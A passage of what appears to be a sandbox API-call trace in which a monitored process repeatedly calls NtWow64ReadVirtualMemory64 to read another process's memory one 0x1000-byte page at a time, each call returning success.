BaseAddress=0x77f68000, Buffer=0x7ff9, BufferSize=0x2898000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f69000, Buffer=0x7ff9, BufferSize=0x2899000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6a000, Buffer=0x7ff9, BufferSize=0x289a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6b000, Buffer=0x7ff9, BufferSize=0x289b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6c000, Buffer=0x7ff9, BufferSize=0x289c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6d000, Buffer=0x7ff9, BufferSize=0x289d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6e000, Buffer=0x7ff9, BufferSize=0x289e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f6f000, Buffer=0x7ff9, BufferSize=0x289f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.141] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f70000, Buffer=0x7ff9, BufferSize=0x28a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f71000, Buffer=0x7ff9, BufferSize=0x28a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f72000, Buffer=0x7ff9, BufferSize=0x28a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f73000, Buffer=0x7ff9, BufferSize=0x28a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f74000, Buffer=0x7ff9, BufferSize=0x28a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f75000, Buffer=0x7ff9, BufferSize=0x28a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f76000, Buffer=0x7ff9, BufferSize=0x28a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f77000, Buffer=0x7ff9, BufferSize=0x28a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f78000, Buffer=0x7ff9, BufferSize=0x28a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.142] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f79000, Buffer=0x7ff9, BufferSize=0x28a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7a000, Buffer=0x7ff9, BufferSize=0x28aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7b000, Buffer=0x7ff9, BufferSize=0x28ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7c000, Buffer=0x7ff9, BufferSize=0x28ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7d000, Buffer=0x7ff9, BufferSize=0x28ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7e000, Buffer=0x7ff9, BufferSize=0x28ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f7f000, Buffer=0x7ff9, BufferSize=0x28af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f80000, Buffer=0x7ff9, BufferSize=0x28b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f81000, Buffer=0x7ff9, BufferSize=0x28b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.143] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f82000, Buffer=0x7ff9, BufferSize=0x28b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f83000, Buffer=0x7ff9, BufferSize=0x28b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f84000, Buffer=0x7ff9, BufferSize=0x28b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f85000, Buffer=0x7ff9, BufferSize=0x28b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f86000, Buffer=0x7ff9, BufferSize=0x28b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f87000, Buffer=0x7ff9, BufferSize=0x28b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f88000, Buffer=0x7ff9, BufferSize=0x28b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f89000, Buffer=0x7ff9, BufferSize=0x28b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8a000, Buffer=0x7ff9, BufferSize=0x28ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.144] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8b000, Buffer=0x7ff9, BufferSize=0x28bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8c000, Buffer=0x7ff9, BufferSize=0x28bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8d000, Buffer=0x7ff9, BufferSize=0x28bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8e000, Buffer=0x7ff9, BufferSize=0x28be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f8f000, Buffer=0x7ff9, BufferSize=0x28bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f90000, Buffer=0x7ff9, BufferSize=0x28c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f91000, Buffer=0x7ff9, BufferSize=0x28c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f92000, Buffer=0x7ff9, BufferSize=0x28c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.145] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f93000, Buffer=0x7ff9, BufferSize=0x28c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f94000, Buffer=0x7ff9, BufferSize=0x28c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f95000, Buffer=0x7ff9, BufferSize=0x28c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f96000, Buffer=0x7ff9, BufferSize=0x28c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f97000, Buffer=0x7ff9, BufferSize=0x28c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f98000, Buffer=0x7ff9, BufferSize=0x28c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f99000, Buffer=0x7ff9, BufferSize=0x28c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9a000, Buffer=0x7ff9, BufferSize=0x28ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9b000, Buffer=0x7ff9, BufferSize=0x28cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.146] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9c000, Buffer=0x7ff9, BufferSize=0x28cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9d000, Buffer=0x7ff9, BufferSize=0x28cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9e000, Buffer=0x7ff9, BufferSize=0x28ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77f9f000, Buffer=0x7ff9, BufferSize=0x28cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa0000, Buffer=0x7ff9, BufferSize=0x28d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa1000, Buffer=0x7ff9, BufferSize=0x28d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa2000, Buffer=0x7ff9, BufferSize=0x28d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa3000, Buffer=0x7ff9, BufferSize=0x28d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa4000, Buffer=0x7ff9, BufferSize=0x28d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.147] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa5000, Buffer=0x7ff9, BufferSize=0x28d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa6000, Buffer=0x7ff9, BufferSize=0x28d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa7000, Buffer=0x7ff9, BufferSize=0x28d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa8000, Buffer=0x7ff9, BufferSize=0x28d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fa9000, Buffer=0x7ff9, BufferSize=0x28d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77faa000, Buffer=0x7ff9, BufferSize=0x28da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fab000, Buffer=0x7ff9, BufferSize=0x28db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fac000, Buffer=0x7ff9, BufferSize=0x28dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fad000, Buffer=0x7ff9, BufferSize=0x28dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fae000, Buffer=0x7ff9, BufferSize=0x28de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.148] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77faf000, Buffer=0x7ff9, BufferSize=0x28df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb0000, Buffer=0x7ff9, BufferSize=0x28e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb1000, Buffer=0x7ff9, BufferSize=0x28e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb2000, Buffer=0x7ff9, BufferSize=0x28e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb3000, Buffer=0x7ff9, BufferSize=0x28e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb4000, Buffer=0x7ff9, BufferSize=0x28e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb5000, Buffer=0x7ff9, BufferSize=0x28e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb6000, Buffer=0x7ff9, BufferSize=0x28e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb7000, Buffer=0x7ff9, BufferSize=0x28e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.149] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb8000, Buffer=0x7ff9, BufferSize=0x28e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fb9000, Buffer=0x7ff9, BufferSize=0x28e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x28ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x28eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x28ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x28ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x28ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x28ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x28f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.150] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x28f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x28f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x28f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x28f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x28f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x28f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x28f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x28f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x28f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.151] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x28fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x28fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x28fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x28fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x28fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x28ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x2900000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x2901000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x2902000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.152] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x2903000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x2904000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x2905000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x2906000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x2907000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.153] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x2908000, NumberOfBytesRead=0x1000 